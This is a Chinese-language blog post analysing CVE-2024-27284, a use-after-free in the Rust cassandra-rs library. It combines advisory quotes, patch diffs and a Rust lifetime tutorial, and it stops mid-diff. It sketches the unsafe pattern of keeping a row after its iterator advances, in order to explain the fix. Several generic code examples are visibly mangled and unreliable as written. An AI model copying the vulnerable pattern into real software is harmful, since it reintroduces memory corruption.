l1nk3dHouse

RustPwn_CVE-2024-27284

2024-04-05T12:49:35.000Z

这个漏洞是一个在和朋友看设计模式的时候无意中找到的漏洞，非常有趣，在这里简单记录一下

本文首发于先知平台 https://xz.aliyun.com/t/14345

CVE-2024-27284

漏洞背景

漏洞本身来自一个叫做Casandra-rs的开源库。

Cassandra 是一个开源的分布式数据库管理系统，由 Apache 软件基金会开发和维护。它被设计为具有高度可扩展性和容错性的分布式存储系统，用于处理大规模数据集的高吞吐量和低延迟的应用程序。Cassandra 使用一种称为 CQL（Cassandra Query Language）的查询语言，它类似于 SQL，但具有一些特定于 Cassandra 的扩展和功能。CQL 提供了灵活的数据模型和查询选项，可以满足各种应用程序的需求。 —— 来自Apache

当前库是一个Rust写的库，理论上Rust是很少能出问题的，但是在现实场景中，由于对底层逻辑的操作需求，Rust也不得不引入unsafe关键字对一些底层的内容进行操作。然而一旦引入了unsafe，Rust在编译期间进行的检查就会失效，在这个过程中就会导致漏洞的出现。

Patch分析

根据漏洞公告，可以看到漏洞描述如下

1
2
3

Code that attempts to use an item (e.g., a row) returned by an iterator after the iterator has advanced to the next item will be accessing freed memory and experience undefined behaviour. Code that uses the item and then advances the iterator is unaffected. This problem has always existed.

This is a use-after-free bug, so it's rated high severity. If your code uses a pre-3.0.0 version of cassandra-rs, and uses an item returned by a cassandra-rs iterator after calling next() on that iterator, then it is vulnerable. However, such code will almost always fail immediately - so we believe it is unlikely that any code using this pattern would have reached production. For peace of mind, we recommend you upgrade anyway.

根据描述，我们可以直到这个漏洞的几个特征：

漏洞类型为UAF
漏洞和迭代器iter有关
漏洞的触发和next()有关系

同时可以找到程序的patch在这个位置。其中有一段内容比较关键:

## Lending iterator API (version 3.0)

Version 3.0 fixes a soundness issue with the previous API. The iterators in the
underlying Cassandra driver invalidate the current item when `next()` is called,
and this was not reflected in the Rust binding prior to version 3.

To deal with this, the various iterators (`ResultIterator`, `RowIterator`,
`MapIterator`, `SetIterator`, `FieldIterator`, `UserTypeIterator`,
`KeyspaceIterator`, `FunctionIterator`, `AggregateIterator`, `TableIterator`,
`ColumnIterator`) no longer implement `std::iter::Iterator`. Instead, since this
is a [lending
iterator,](https://blog.rust-lang.org/2022/11/03/Rust-1.65.0.html#generic-associated-types-gats)
these types all implement a new `LendingIterator` trait. We define this
ourselves because there is currently no widely-used crate that implements it.

观察修复的内容，可以找到大致有两类修复代码：

一类则是增加了生命周期的声明：

    /// A field's metadata
-   pub struct Field {
+   //
+   // Borrowed from wherever the value is borrowed from.
+   pub struct Field<'a> {
        /// The field's name
        pub name: String,
        /// The field's value
-       pub value: Value,
+       pub value: Value<'a>,
}

另一类则是增加了一些关于生命周期和幽灵数据的声明

    #[derive(Debug)]
-   pub struct RowIterator(pub *mut _CassIterator);
+   pub struct RowIterator<'a>(*mut _CassIterator, PhantomData<&'a _Row>);

-   // The underlying C type has no thread-local state, but does not support access
-   // from multiple threads: https://datastax.github.io/cpp-driver/topics/#thread-safety
-   unsafe impl Send for RowIterator {}
+   // The underlying C type has no thread-local state, and forbids only concurrent
+   // mutation/free: https://datastax.github.io/cpp-driver/topics/#thread-safety
+   unsafe impl Send for RowIterator<'_> {}
+   unsafe impl Sync for RowIterator<'_> {}

-   impl Drop for RowIterator {
+   impl Drop for RowIterator<'_> {
        fn drop(&mut self) {
            unsafe { cass_iterator_free(self.0) }
        }
    }

-   impl iter::Iterator for RowIterator {
-       type Item = Value;

-       fn next(&mut self) -> Option<<Self as Iterator>::Item> {
-           unsafe {
-               match cass_iterator_next(self.0) {
-                   cass_false => None,
-                   cass_true => Some(Value::build(cass_iterator_get_column(self.0))),
-               }
-           }
-       }
-   }

-   impl<'a> Iterator for &'a RowIterator {
-       type Item = Value;
+   impl LendingIterator for RowIterator<'_> {
+       type Item<'a> = Value<'a> where Self: 'a;

-       fn next(&mut self) -> Option<<Self as Iterator>::Item> {
+       fn next(&mut self) -> Option<<Self as LendingIterator>::Item<'_>> {
            unsafe {
                match cass_iterator_next(self.0) {
                    cass_false => None,
                    cass_true => Some(Value::build(cass_iterator_get_column(self.0))),
                }
            }
        }
}

可以看到，这里对类型RowIterator新增了生命周期的定义，并且这个LendingIterator似乎是一个新增的描述概念，作者同样添加到了README中:

## Lending iterator API (version 3.0)

Version 3.0 fixes a soundness issue with the previous API. The iterators in the
underlying Cassandra driver invalidate the current item when `next()` is called,
and this was not reflected in the Rust binding prior to version 3.

To deal with this, the various iterators (`ResultIterator`, `RowIterator`,
`MapIterator`, `SetIterator`, `FieldIterator`, `UserTypeIterator`,
`KeyspaceIterator`, `FunctionIterator`, `AggregateIterator`, `TableIterator`,
`ColumnIterator`) no longer implement `std::iter::Iterator`. Instead, since this
is a [lending
iterator,](https://blog.rust-lang.org/2022/11/03/Rust-1.65.0.html#generic-associated-types-gats)
these types all implement a new `LendingIterator` trait. We define this
ourselves because there is currently no widely-used crate that implements it.

并且修复commit中，作者提到

Make ResultIterator a LendingIterator

换句话说，这些迭代器全部改成了LendingIterator，尤其是这个ResultIterator。那么总结以下，漏洞修复方案大概是：

将迭代器由Iterator修改为LendingIterator
将数据对象增加生命周期，并且对某些结构体增加幽灵成员以增加生命周期

整体修复全是基于Rust特性进行的操作。为了能够更好的了解这个修复过程发生了什么，我们需要了解rust中关于生命周期的一些概念。熟悉的同学可以直接跳到漏洞分析。

Rust基本特性补充

基础篇

所有权与引用

Rust这门语言之所以被人称之为【安全语言】，是因为Rust在编译期间会做非常多的检查工作。这些检查工作会在编译阶段进行，这就导致rust这个语言非常难以通过编译。因为它一旦通过编译，意味着编译器基本上完成了大部分的检查工作。在这个设计思想下，诞生出了一种用于检测变量是否被多次使用的概念：所有权(Own)

在Rust种，每一个变量都是有所有权的，比如:

let s1 = String::from("hello");
let s2 = s1;
// 这里会报错
println!("{}, world!", s1);

在其他语言中，这种写法完全没问题，而对于Rust而言，赋值语句为一种交予所有权的形式，此时s2获得了s1的所有权，上述的赋值过程中，s1将自己的所有权交给了s2，这就意味着从这个时候开始，s1不应被继续使用。从Rust的语法上，我们了解到这个程度即可，但是此时存在一个问题：这个s1的这段是否存在？这里有两种可能的解释

s1被当场销毁了，同时s2为s1新拷贝的对象
s1其实没有被销毁，只是编译器在编译阶段不允许我们使用而已

为了验证上述做法，接下来我们简单的定义一个对象Test1，并且实现对应的trait中的Drop接口（就理解成析构函数即可）

#[derive(Debug)]
pub struct Test1 {
    n1: u32
}

impl Drop for Test1 {
    fn drop(&mut self) {
        println!("Drop for test1111");
    }
}

impl Test1 {
    
    pub fn new() -> Test1 {
        Test1 {n1:1}
    }
}

fn main() {
        
    // let test2;
    let test1 = Test1::new();
    let test2 = test1;

    println!("Test1 is {:?}", test2);
}

运行这段代码的结果如下:

1 2	Test1 is Test1 { n1: 1 } Drop for test1111

可以看到，此时test1真正被销毁的时候是在整个main函数结束的时候。也就是说，在这段代码执行的时候，至始至终只创建了一个对象。对于Rust而言，每一个变量的生命周期本质上和C类似，是以大括号为边界，在离开大括号后被销毁。
然而Rust编译器并非是按照二进制层面的生命周期进行考虑，而是有一套自定义的规矩。这意味着，即便从二进制角度上看，这里的test1和test2指代的依然是同一个对象，但是Rust编译器认为，当所有权发生从test1变为test2的时候，此时就不该使用test1对象，应当将其当作被销毁而不再使用。

如果此时想要描述test1和test2是同一个对象，那么可以使用一个叫做引用的概念:

let test1 = Test1::new();
let test2 = &test1;

println!("Test1 is {:?}", test1);

如果这样声明，此时相当于告知编译器，test2本质上将会使用test1对象中的内容，此时程序将不会报错。
同时，从二进制角度上看，上述两端代码编译的结果完全没变。这也说明了Rust中新增的许多特性本质上是从编译阶段杜绝漏洞的出现，而非通过代码膨胀的方式新增防护策略

生命周期

当聊到Rust针对引用展开的保护时，本质上聊的其实是引用对象的生命周期。官方的说法为

every reference in Rust has a lifetime, which is the scope for which that reference is valid.

对于生命周期的检查，官方使用借用检查Borrow Checker（借调者检查）来比较生命周期的长度。例如一个常见的问题：

let test2;
{
    let test1 = Test1::new();
    test2 = &test1;
}

println!("Test1 is {:?}", test2);

此时test2获取了test1的引用，但是实际上在离开大括号范围后，test1就会被销毁，而我们test2却依然握着这个引用，显然是不合理的。此时rust就会报错，提示被借用的值之后依然被引用了:

error[E0597]: `test1` does not live long enough
   --> src/main.rs:226:17
    |
225 |         let test1 = Test1::new();
    |             ----- binding `test1` declared here
226 |         test2 = &test1;
    |                 ^^^^^^ borrowed value does not live long enough
227 |     }
    |     - `test1` dropped here while still borrowed
228 |
229 |     println!("Test1 is {:?}", test2);
    |                               ----- borrow later used here

然而，在某些场合，编译器会失去对生命周期的判断能力。例如假设我们此时有一个函数如下:

fn compare(x: &Test1, y: &Test1) -> &Test1 {
    if x.n1 > y.n1 {
        x
    } else {
        y
    }
}

fn main() {
        
    let mut test1 = Test1::new();
    test1.set_n(1);
    let mut test2 = Test1::new();
    test2.set_n(2);

    let test3 = compare(&test1, &test2);

    println!("Test1 is {:?}", test3);

}

此时我们想要比较test1和test2的大小关系，并且用test3引用比较大的那个。虽然这样乍一看很合理，但是编译的时候rust会告诉我们它的疑惑:

error[E0106]: missing lifetime specifier
   --> src/main.rs:221:37
    |
221 | fn compare(x: &Test1, y: &Test1) -> &Test1 {
    |               ------     ------     ^ expected named lifetime parameter
    |
    = help: this function's return type contains a borrowed value, but the signature does not say whether it is borrowed from `x` or `y`
help: consider introducing a named lifetime parameter
    |
221 | fn compare<'a>(x: &'a Test1, y: &'a Test1) -> &'a Test1 {
    |           ++++     ++            ++            ++

实际上这个函数存在一个模棱两可的地方：返回值为某一个值的引用，但是这一个值究竟是x的引用，还是y的引用呢？实际上这里有这几种猜测:

返回值和x的引用周期保持一致，此时编译器之后允许y的对象在返回值被销毁前被销毁
返回值和y的引用周期保持一致，此时编译器之后允许x的对象在返回值被销毁前被销毁
返回值和x和y中比较短的那个生命周期保持一致。

这种不确定性需要开发者手动指定，可以看到报错中也显示的给了我们一个推荐的做法：强制指定生命周期。

包含引用时，生命周期语法如下:

1
2
3

&i32        // a reference
&'a i32     // a reference with an explicit lifetime
&'a mut i32 // a mutable reference with an explicit lifetime

当声明了生命周期后，此时rust会将这些被声明了生命周期的变量同步，也就是这些变量的生命周期长度会保持一致。此时我们可以修改上述代码:

fn compare<'a>(x: &'a Test1, y: &'a Test1) -> &'a Test1 {
    if x.n1 > y.n1 {
        x
    } else {
        y
    }
}

这种写法表示compare的返回值的生命周期长度和传入的x，y生命周期长度一致。然而，这个一致仅限于当前函数传入前后，其不会影响所有的生命周期判断。例如:

fn main() {
        
    let mut test1 = Test1::new();
    test1.set_n(1);
    {
        let mut test2 = Test1::new();
        test2.set_n(2);

        let test3 = compare(&test1, &test2);
    }

    // ERROR！
    println!("Test1 is {:?}", test3);
    // however, if print test1, it was correct
}

虽然我们再compare函数中，声明了test3、test2和test1之间生命周期同等长度，但是实际上调用的时候，test3的生命周期再大括号中，并没有test1那么长，所以此时打印test3会报错（但是此时打印test1是正常的）。

泛型、Trait和生命周期

无论在C++，还是在rust这类语言中，在编译期间做出大量的检查（或许还有代码膨胀）是其一个非常重要的组成部分，而在这之中，对于代码层面的抽象是其中最大的特色之一。在C++中，这种抽象会被称之为template，而在Rust中，这种抽象被称之为泛型（generics）

举例来说，假设我们需要一个函数，能够取出数组中的最大值，在Rust中支持如下的写法：

fn largest(list: &[T]) -> &T {
    let mut largest = &list[0];

    for item in list {
        if item > largest {  // 这里会报错。
            largest = item;
        }
    }

    largest
}

这里就表示，此时无论list这个数组中的元素是u32类型还是float类型，我们都能够取出最大值。这个操作乍一看很合理，但是我们仔细想一下，假设传入的T不支持>这种符号比较呢！（例如我们自定义的Color类型，颜色怎么能比较呢）。因此当前状态下，编译器理所当然会发生报错:

1 2	error[E0369]: binary operation `>` cannot be applied to type `&T` --> src/main.rs:233:17

那么反过来想，如果我们此处只需要告知编译器，这个函数传入的泛型一定实现了大于号的比较，那编译器就不需要为此报错了。这就引入了第二个概念：Trait，也就是特征，和java中的接口类似，在C++中大概可以勉强理解成SFINAE或者enable_if？Rust官方给trait的解释也类似

Traits are similar to a feature often called interfaces in other languages, although with some differences.

有点像接口，但又不完全是。Rust的Trait和其他语言一样，也是表示某种类（或者结构体）描述中共同的一个函数，但Trait是一种不与任何类型强绑定的接口。用C++中最经典的猫狗叫作为例子：首先，因为所有的动物都会叫，所以我们定义一个Trait，叫做Sounds:

1
2
3

pub trait Sounds {
    fn animal_sounds(&self) -> String;
}

这里表示无论什么动物都会进行吼叫
接下来我们简单实现猫和狗的定义，并且对接口进行实现

struct Cat {
    cat_sounds: String
}

struct Dog {
    dog_sounds: String
}

impl Cat {
    fn new() -> Cat {
        Cat {
            cat_sounds: String::from("Meow")
        }
    }
}

impl Sounds for Cat{
    fn animal_sounds(&self) -> String {
        format!("cat sounds:{}", self.cat_sounds)
    }
}

impl Dog {
    fn new() -> Dog {
        Dog {
            dog_sounds: String::from("Bark")
        }
    }
}

impl Sounds for Dog{
    fn animal_sounds(&self) -> String {
        format!("dog sounds:{}", self.dog_sounds)
    }
}

正如其他语言，猫和狗都实现了对应的接口。然而Trait与C++相比，当我们在C++中做这个模型的时候，我们通常会先定义一个叫做Animal的抽象父类，并且由Dog和Cat对其进行继承。然而在Rust中，我们并不需要特地定义一个对应的父类。而与Java相比，interface虽然也表现类似，但是Rust中的Trait可以更加灵活的按照C++中的虚类使用，例如可以这样调用:

let cat: Box<dyn Sounds> = Box::new(Cat::new());
let dog: Box<dyn Sounds> = Box::new(Dog::new());

let animals: Vec<Box<dyn Sounds>> = vec![cat, dog];

for animal in animals {
    println!("{}",animal.animal_sounds());
}

此时虽然Cat和Dog都没有继承一个共同的父类，但是通过声明dyn，可以告知编译器当先的对象已经实现了对应的特征，所以可以使用类似虚函数的方式进行调用。

那么回到刚刚的话题上，我们先前提到的largest函数定义如下

1	fn largest(list: &[T]) -> &T

它无法编译通过的理由是编译器没有办法判断对应的泛型是否实现了比较接口，所以我们可以显示的给其声明必须实现某些特定Trait才能调用，比如说可以进行比较，在Rust中，>这个符号被重载在std::cmp::PartialOrd这个默认方法上，所以能够被>进行比较的对象一定都实现了std::cmp::PartialOrd于是这里可以改成:

1	fn largestPartialOrd>(list: &[T]) -> &T

表明当前对象是可以进行比较，当这样声明后，Rust编译器就会对调用largest的过程进行检查，从而能够让当前编译通过。如果想要一个泛型需要同时实现多个trait，可以这样写:

1	fn largestPartialOrd + Display>(list: &[T]) -> &T

这样声明后，表明这个函数对应的泛型T还得实现了Display的接口。这种让泛型和trait绑定的过程称之为trait bounding。在这个基础上，一个函数可以定义多个不同的泛型，支持不同的trait：

1	fn functionPartialOrd + Display, U: Clone + Display>(t: T, u: U) -> &T

这样写起来太丑了，于是Rust又放了一个新的关键字where，可以简化上述的描述:

1
2
3

fn function(t: T, u: U) -> &T 
    where T:Display + PartialOrd,
          U:Clone + Display

对于Rust而言，生命周期本质上也是一种泛型，所以可以在声明泛型的同时，声明对应的生命周期，例如我们可以再次修改largest函数：

fn largest<'a, T: PartialOrd>(list: &'a [T], new_num: &'a T) -> &'a T {
    let mut largest = &list[0];

    for item in list {
        if item > largest { 
            largest = item;
        }
    }

    if largest < new_num{
        largest = new_num
    }
    largest
}

这里我们加入了新的变量和返回值，并且让所有的参数和返回值生命周期一致，这样我们就能保证我们传入的参数和返回值的生命周期长度一致。

漏洞相关Rust基础知识

虚幻数据`PhantomData`

实际上，结构体本身也是可以有生命周期的，例如:

1
2
3

struct Tmp<'a>{
    index: &'a u32
}

上述声明中，虽然index为一个引用，但是这样声明后，相当于告诉编译器，Tmp对象的生命周期会和index保持一致。当然这并不会刻意的错误延长某些场景的生命周期，例如:

let test1 = 2;
{
    let tmp = Tmp::new(&test1);
}

println!("{:?}", test1);

虽然我们生命周期中提到了tmp和test1的长度一致，但是这也不代表在上面的情况下，作为结构体的tmp被销毁的时test1也将无法使用。这是比较常见的场景，然而在某些特定的场合想，可能并非结构体中的某个成员变量，而是结构体本身会和某个对象关联，这种情况比较少，但是也不是完全不存在。例如在这种代码模型下:

#[derive(Debug)]
pub struct Test1 {
    n1: u32
}
impl Test1 {
    
    pub fn new() -> Test1 {
        Test1 {n1:1}
    }

    pub fn set_n(&mut self, n:u32) {
        self.n1 = n;
    }
    pub fn get_test2(&self) -> Test2{
        Test2 {n1:2}
    }

}

此时Test2对象由Test1对象生成，这种模型常见于某些操作不安全数据的对象中，例如在会话对象中获取连接，抑或是从迭代器对象中获取数据，均可能出现这种写法。然而一般情况下，Rust是不允许直接声明一个结构体具有生命周期的，因为结构体的声明周期肯定需要关联到某个成员变量上，然而在上述模型中，显然是结构体生命周期与一些逻辑关联了。为了解决这种问题，Rust提出了一种叫做PhatomData(幽灵数据)的数据结构，该结构不占据结构体中的任意一个空间，但是却可以充当生命周期使用。例如:

pub struct Test2<'a> {
    n1: u32,
    _marker: PhantomData<&'a Test1>,
}

此时可以理解成，Test2将会和Test1上进行协变(covariant)。协变这个概念比较复杂，但是在这个例子中有一个更通俗的理解：无论Test2结构体的生命周期有多长，它都将会收缩至和Test1结构生命周期对齐。此时Test1中的声明需要改成

1
2
3

pub fn get_test2<'a>(&'a self) -> Test2<'a>{
    Test2 {n1:2, _marker:PhantomData}
}

表明当前生命周期范围。如下的代码就是一个很好的例子

fn main()
{
    let test3;
    println!("start test3");
    {
        let test1 = Test1::new();
        let test2 = test1.get_test2();
        test3 = test2;
    }
    println!("test3 is {:?}", test3);
}

可以看到，test指向的是Test2对象，并且生命周期比test1要长。在未声明虚幻数据前，两个结构体之间没有关系，因此这段代码没有任何问题，然而在声明虚幻数据后，由于发生了协变，Test2对象（也就是test3）生命周期缩短至与test1一致，此时就会抛出错误:

error[E0597]: `test1` does not live long enough
   --> src/main.rs:213:21
    |
212 |         let test1 = Test1::new();
    |             ----- binding `test1` declared here
213 |         let test2 = test1.get_test2();
    |                     ^^^^^^^^^^^^^^^^^ borrowed value does not live long enough
214 |         test3 = test2;
215 |     }
    |     - `test1` dropped here while still borrowed
...
219 | }
    | - borrow might be used here, when `test3` is dropped and runs the `Drop` code for type `Test2`
    |
    = note: values in a scope are dropped in the opposite order they are defined

迭代器 iter

不同的语言中都有迭代器这个概念，Rust也不例外，例如常见的数组:

let mut test_vec = vec![1,2,3,4,5,6];
let it_vec = test_vec.iter();

for val in it_vec {
    println!("Got: {}", val);
}

可以看到，这里拿到的test_vec本质上只是一个迭代器，迭代器的接口通常如下:

pub trait Iterator {
    type Item;

    fn next(&mut self) -> Option<Self::Item>;

    // 此处省略了方法的默认实现
}

这里的type是Rust中的一种叫做关联类型（associated type）的特性，一般出现在trait中，表示当前的trait在使用的时候，需要对类型进行指定。其本质类似于泛型，例如我们也可以以如下的方式实现这个接口

impl Iterator for Counter {
    type Item = u32;

    fn next(&mut self) -> Option<Self::Item> {
        // --snip--

这里我们给Counter对象实现了一个Iterator接口，并且指明了在这里的Item表示u32，则在之后对Counter的迭代对象进行迭代的时候，其一定会返回Option。在迭代器中，有几种不同的迭代器：

iter:正如声明，这种返回的是一个不可变的迭代器，不能修改迭代器中的元素，但是也因此不会发生迭代器中对象的所有权转移，也就不会发生对象的销毁，被迭代对象就依然可被使用
iter_mut:与前者的区别在于，返回的是可变的迭代器对象
into_iter:这种迭代器进行迭代的时候，迭代器的对象会被消费，也就是发生了所有权的转移，此时被迭代器对象不可在被使用

特征	iter	iter_mut	into_iter
迭代元素对象是否可变	不可变	可变	不可变
所有权是否变化	未变	未变	变化为迭代对象

以下代码就能说明这三者的区别:

let mut test = vec![1,2,3,4];
// let mut iter = test.iter();
println!("iter mutable");
for it in test.iter_mut() {
    println!("target is {}", it);
    *it = 1;
}
println!("iter");
for it in test.iter() {
    println!("target is {}", it);
}
println!("iter into");
for it in test.into_iter() {
    println!("target is {}", it);
}
// 在这之后test对象就被销毁了
// println!("{:?}",test); 这里将会报错

漏洞分析

Patch分析

公告中强调的ResultIterator是漏洞分析的切入点，首先回顾这个迭代器的相关逻辑:

    #[derive(Debug)]
-   pub struct ResultIterator<'a>(pub *mut _CassIterator, usize, PhantomData<&'a CassResult>);
+   pub struct ResultIterator<'a>(*mut _CassIterator, usize, PhantomData<&'a _CassResult>);

-   // The underlying C type has no thread-local state, but does not support access
-   // from multiple threads: https://datastax.github.io/cpp-driver/topics/#thread-safety
-   unsafe impl<'a> Send for ResultIterator<'a> {}
+   // The underlying C type has no thread-local state, and forbids only concurrent
+   // mutation/free: https://datastax.github.io/cpp-driver/topics/#thread-safety
+   unsafe impl Send for ResultIterator<'_> {}
+   unsafe impl Sync for ResultIterator<'_> {}

    impl<'a> Drop for ResultIterator<'a> {
        fn drop(&mut self) {
            unsafe { cass_iterator_free(self.0) }
        }
    }

-   impl<'a> Iterator for ResultIterator<'a> {
-       type Item = Row<'a>;
-       fn next(&mut self) -> Option<<Self as Iterator>::Item> {
+   impl LendingIterator for ResultIterator<'_> {
+       type Item<'a> = Row<'a> where Self: 'a;
+
+       fn next(&mut self) -> Option<<Self as LendingIterator>::Item<'_>> {
            unsafe {
                match cass_iterator_next(self.0) {
                    cass_false => None,
                    cass_true => Some(self.get_row()),
                }
            }
        }
        fn size_hint(&self) -> (usize, Option<usize>) {
            (0, Some(self.1))
        }
    }
-   impl<'a> ResultIterator<'a> {
-       /// Gets the next row in the result set
-       pub fn get_row(&mut self) -> Row<'a> {
+   impl ResultIterator<'_> {
+       /// Gets the current row in the result set
+       pub fn get_row(&self) -> Row {
            unsafe { Row::build(cass_iterator_get_row(self.0)) }
    }
}

重点关注其中的next函数，我们会发现，代码修改前后都声明了Row对象和这个ResultIterator的生命周期，同时next函数功能为调用ResultIterator迭代器中实现的get_row函数。

这边的LendingIterator为库自身实现的一个接口，本质上和原先Iterator写法类似，所以这里只是省略了没写，但是也是一样声明了生命周期，后面会提及

这个get_row函数调用的函数cass_iterator_get_row为一个CPP实现的函数，其细节如下

const CassRow* cass_iterator_get_row(const CassIterator* iterator) {
  if (iterator->type() != CASS_ITERATOR_TYPE_RESULT) {
    return NULL;
  }
  return CassRow::to(static_cast<const ResultIterator*>(iterator->from())->row());
}

这里的ResultIterator是一个表示迭代器的类，其实现如下

class ResultIterator : public Iterator {
public:
  ResultIterator(const ResultResponse* result)
      : Iterator(CASS_ITERATOR_TYPE_RESULT)
      , result_(result)
      , index_(-1)
      , row_(result) {
    decoder_ = (const_cast(result))->row_decoder();
    row_.values.reserve(result->column_count());
  }

  virtual bool next() {
    // skip code
  }

  const Row* row() const {
    assert(index_ >= 0 && index_ < result_->row_count());
    if (index_ > 0) {
      return &row_;
    } else {
      return &result_->first_row();
    }
  }
  private:
  const ResultResponse* result_;
  Decoder decoder_;
  int32_t index_;
  Row row_;
};

这里可以看到ResultIterator对象中，存放了一个叫做Row的对象，这个对象被创建的时候，对应的row_对象也会被初始化，并且在名为row的函数中，会根据当前的row_count返回不同的指针。那么在这里我们可以得出第一条结论

ResultIterator 和 Row 处在同一片内存空间中，当 ResultIterator 被销毁的时候，Row也将被销毁

接下来，确认这个ResultIterator在程序中是如何创建和使用的:

impl CassResult {
    /// Gets the number of rows for the specified result.
    // ...

    /// Creates a new iterator for the specified result. This can be
    /// used to iterate over rows in the result.
    pub fn iter(&self) -> ResultIterator {
        unsafe {
            ResultIterator(
                cass_iterator_from_result(self.0),
                cass_result_row_count(self.0),
                PhantomData,
            )
        }
    }
}

可以看到，迭代器对象由CassResult对象创建，这里的CaseResult对象指针正是前面ResultIterator对象创建时使用的指针:

ResultIterator(const ResultResponse* result)
    : Iterator(CASS_ITERATOR_TYPE_RESULT)
    , result_(result)         // CaseResult pointer
    , index_(-1)
    , row_(result)            // CaseResult pointer

于是，这里能得到第二个结论

CaseResult 的裸指针传递给了 ResultIterator，并且ResultIterator中会使用 result_ 来操作对象

那么这里就能看到第一个问题：当 CaseResult 在 ResultIterator 销毁前被销毁，ResultIterator使用next的时候就将访问一个未初始化的内存。。。吗？尝试编写一个这样的poc


let tmp_iter;
{
    let result = get_result();
    tmp_iter = result.iter();
}
println!("Using tmp iter here {:?}", tmp_iter);

很容易就会发现编译器报错，说明被rust编译器检查出来了。这要归功于 ResultIterator 声明的 PhantomData字段：

1
2
3

    #[derive(Debug)]
-   pub struct ResultIterator<'a>(pub *mut _CassIterator, usize, PhantomData<&'a CassResult>);
+   pub struct ResultIterator<'a>(*mut _CassIterator, usize, PhantomData<&'a _CassResult>);

可以看到，无论修改前还是修改后，PhantomData逻辑都是保留的，所以ResultIterator的生命周期始终和CassREsult保持同步，保护始终生效。换句话说，这个想法并非为漏洞点。

核心漏洞点

那漏洞到底出现在哪儿呢？回到我们分析的第一个点以及维护者提到的next，这个漏洞应该是由于迭代器引发的，那么本质上应该是一个迭代器相关的点触发的问题。重新检查patch，会发现一个很容易忽略的点，在许多的example文件中，都出现了类似的修改

1
2
3

-   for row in result.iter() {
+   let mut iter = result.iter();
+   while let Some(row) = iter.next() {

最初我以为这个修改无关痛痒，毕竟这个看起来只是用法不同。然而当我强行将其改成修改前的调用模式时，会提示如下的问题：

error[E0277]: `cassandra_cpp::cassandra::result::ResultIterator<'_>` is not an iterator
  --> examples/simple2.rs:19:16
   |
19 |     for row in result.iter() {
   |                ^^^^^^^^^^^^^ `cassandra_cpp::cassandra::result::ResultIterator<'_>` is not an iterator
   |
   = help: the trait `Iterator` is not implemented for `cassandra_cpp::cassandra::result::ResultIterator<'_>`
   = note: required for `cassandra_cpp::cassandra::result::ResultIterator<'_>` to implement `IntoIterator`

换句话说，这个写法会直接导致错误，因为修正后的ResultIterator并没有去实现Iterator的特征。实际上作者也进行了相关提醒:

/// An iterator over the results of a query. The result holds the data, so
/// the result must last for at least the lifetime of the iterator.
///
/// This is a lending iterator (you must stop using each item before you move to
/// the next), and so it does not implement `std::iter::Iterator`. The best way
/// to use it is as follows:

结合报错以及生命周期声明，这里会注意到几个特点

修复后的漏洞并没有继承Iterator，而是使用了自行定义的迭代器特征，所以才没办法使用for-in-loop
ResultIterator是一个C++中的对象，其中包含了一个Row对象，而非指针
ResultIterator的生命周期和Row的生命周期在Rust中并非强绑定关系

修复公告中强调ResultIterator不在支持Iterator而是LendingIterator，观察其代码如下

-   impl<'a> Iterator for ResultIterator<'a> {
-       type Item = Row<'a>;
-       fn next(&mut self) -> Option<<Self as Iterator>::Item> {
+   impl LendingIterator for ResultIterator<'_> {
+       type Item<'a> = Row<'a> where Self: 'a;
+
+       fn next(&mut self) -> Option<<Self as LendingIterator>::Item<'_>> {

这个修改前的代码具有一定的迷惑性，乍一看它和修改后一样，都保持了ResultIterator和Item指代的Row类型生命周期长度一致，只不过一个直接显示的指定生命周期，一个使用了Self；一个使用Item指定了带有生命周期的Row<'a>，另一个声明了有生命周期的Item<'a>。然而实际上，Row<'a>的生命周期并非就是真的是Row对象。这里可以检查定义

    /// A collection of column values. Read-only, so thread-safe.
-   pub struct Row<'a>(*const _Row, PhantomData<&'a CassResult>);
+   //
+   // Borrowed immutably.
+   pub struct Row<'a>(*const _Row, PhantomData<&'a _Row>);

如果结合这段代码看，我们就能发现，修改前的ResultIterator的生命周期，实际上和Row中指定的CassResult生命周期保持一致。CassResult这个对象提供了接口获取ResultIterator对象，他们之间的关系类似于

1
2
3

CassResult --- Create --> ResultIterator 
                            |
                            +-- Create from self --> Row

从设计角度上看，也没太多问题，毕竟查询结果的每一行的生命周期与查询结果一致是理所当然的。然而在实现过程中，Row自于ResultIterator，而这没有显示的指明Row与ResultIterator的关系，这就导致在修改前ResultIterator和Row在Rust中允许生命周期长度不同，而在C中这两个对象却来自于同一块内存。这种场景中，一旦声明变量为Row类型，并且生命周期长度超过了ResultIterator，就会导致Row对象在ResultIterator被销毁后依然被使用。同时，由于生命周期声明错误，Rust编译器也会无法察觉当前问题，就会产生前文提到的UAF问题。

举个例子（这个代码只用于示范，无法运行）


let mut tmp_row = None;
let result = function.get_result();
{
    for row in result.iter() {
        if condition.satisfied():
            tmp_row = Some(row)
            break;
    }
}

println!("here will cause problem {:?}", tmp_row);

实际上，这种代码在实际中很可能存在

修复策略

作者首先提供了LendingIterator，这个接口如下:

pub trait LendingIterator {
    /// The type of each item.
    type Item<'a>
    where
        Self: 'a;

    /// skip some code
}

可以看到，这边声明关联类型 Item 的时候，强制指定其要与Trait对象一致。换句话说，这里描述的trait要求实现当前接口的对象要和Item对象包含的结构成员生命周期保持一致。这其实是一个Rust提供的新特性（作者在README提到）连接在这

概括来说，这个特性能够实现以下的效果：

定义一个特征，并且在接口中声明一种关联类型的时候，声明生命周期，并且指定其和Self一致
当某个特定的结构体实现特征的时候，这个结构体使用关联类型参与的特征函数时，结构体与特征生命周期保持一致

最典型的就是我们上述提到的这个场景：我们需要迭代器与迭代器其中的类型生命周期保持一致。修复主要是通过这个特性实现的

其次，这里的Row也进行了一定的修改

    /// A collection of column values. Read-only, so thread-safe.
-   pub struct Row<'a>(*const _Row, PhantomData<&'a CassResult>);
+   //
+   // Borrowed immutably.
+   pub struct Row<'a>(*const _Row, PhantomData<&'a _Row>);

这里的幽灵数据指向了Row自己（这个_Row就是来自C++的Row的指针）。

结合上述修改，此时Row指针的生命周期就和ResultIterator绑定了。如果此时我们尝试在ResultIterator生命周期使用取出来的Row，此时则会提示其中一方生命周期超出另一方，最终造成问题：

error[E0597]: `iter` does not live long enough
  --> example.rs
   |
21 |     let mut iter = result.iter();
   |         -------- binding `iter` declared here
22 |     while let Some(row) = iter.next() {
   |                           ^^^^ borrowed value does not live long enough
...
28 |     }
   |     - `iter` dropped here while still borrowed
29 |
30 |     println!("here will cause problem {:?}", tmp_row);
   |

其他点分析

除去刚刚的漏洞点外，代码还给很多对象增加了幽灵数据，例如：

1
2
3

    #[derive(Debug)]
-   pub struct RowIterator(pub *mut _CassIterator);
